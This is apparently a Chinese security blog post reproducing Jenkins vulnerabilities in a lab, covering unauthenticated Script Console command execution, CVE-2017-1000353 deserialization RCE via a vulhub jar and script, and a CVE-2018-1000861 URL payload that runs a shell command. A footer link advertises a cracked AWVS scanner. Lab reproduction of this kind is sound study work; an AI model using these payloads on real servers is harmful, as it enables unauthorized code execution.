Jenkins未授权访问漏洞

环境准备

下载安装包,版本1.620.1.1.norach

wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm


安装Jenkins

rpm -ivh jenkins-1.620-1.1.noarch.rpm


启动Jenkins服务

service jenkins start


关闭防火墙或放行8080端口

systemctl stop firewalld.service

未授权访问地址

http://192.168.254.151:8080/manage
http://192.168.254.151:8080/script

访问manage页面

进入Script Console


进入Script Console之后是一个执行脚本的页面

查询当前用户

println "whoami".execute().text


查看IP配置信息

println "ifconfig -a".execute().text

Jenkins 远程代码执行漏洞

版本:2.46.1

POC

https://github.com/vulhub/CVE-2017-1000353

生成序列化字符串

jar包地址:

https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar


生成字节码命令

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
# jenkins_poc.ser是生成的字节码文件名
# "touch ..."是待执行的任意命令

发送数据包执行命令

python3 exploit.py http://your-ip:8080 jenkins_poc.ser

检查文件是否创建

docker exec cve-2017-1000353_jenkins_1 ls /tmp/

Jenkins远程命令执行漏洞

CVE-2018-1000861

版本:2.138

POC

http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true
&value=public class x {
  public x(){
    "touch /tmp/success".execute()
  }
}

检查文件是否创建

docker exec cve-2018-1000861_jenkins_1 ls -lha /tmp/

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

# css # less # 安全 # zookeeper
Logo
华为云开发者联盟

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐

cover

通过HPA+CronHPA组合应对业务复杂弹性伸缩场景

avatar 华为云开发者联盟
cover

FT-FMEA融合混沌演练,零售运营系统韧性架构在线验证实践

avatar 华为云开发者联盟
cover

如何使用Python和Plotly绘制3D图形

avatar 华为云开发者联盟